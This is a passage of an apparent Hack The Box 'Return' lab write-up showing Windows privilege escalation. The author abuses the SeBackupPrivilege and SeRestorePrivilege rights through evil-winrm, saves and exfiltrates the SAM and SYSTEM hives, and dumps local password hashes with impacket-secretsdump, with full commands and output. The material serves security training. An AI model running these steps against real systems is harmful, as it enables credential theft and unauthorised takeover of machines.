SeBackupPrivilege / SeRestorePrivilege
I discovered that the svc-printer user has both SeBackupPrivilege and SeRestorePrivilege enabled. Those privileges can be abused for privilege escalation.
both sebackupprivilege and serestoreprivilege, by default, inherited from membership to the Server Operators group in an Active Directory environment, along with a few other privileges that aren’t relevant for privilege escalations.
This was somewhat predicted in the earlier stage of the operation as I knew that the svc-printer user is part of the Server Operators group
Essentially, those privileges grants both read/write access to EVERY FILE in the system.
*evil-winrm* ps c:\tmp> cmd /c reg save HKLM\SAM sam
The operation completed successfully.
*evil-winrm* ps c:\tmp> cmd /c reg save HKLM\SYSTEM system
The operation completed successfully.I can exploit it by just saving the SAM and SYSTEM data since I have both read/write access to EVERY FILE in the system
*evil-winrm* ps c:\tmp> download C:\tmp\sam sam
info: Downloading C:\tmp\sam to sam
info: Download successful!
*evil-winrm* ps c:\tmp> download C:\tmp\system system
info: Downloading C:\tmp\system to system
info: Download successful!Then I can just transfer those 2 files to Kali using the existing evil-winrm session
Hashdump
┌──(kali㉿kali)-[~/…/htb/labs/return/hashdump]
└─$ impacket-secretsdump LOCAL -sam sam -system system -outputfile hashdump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... I can then just dump the credential hashes using impacket-secretsdump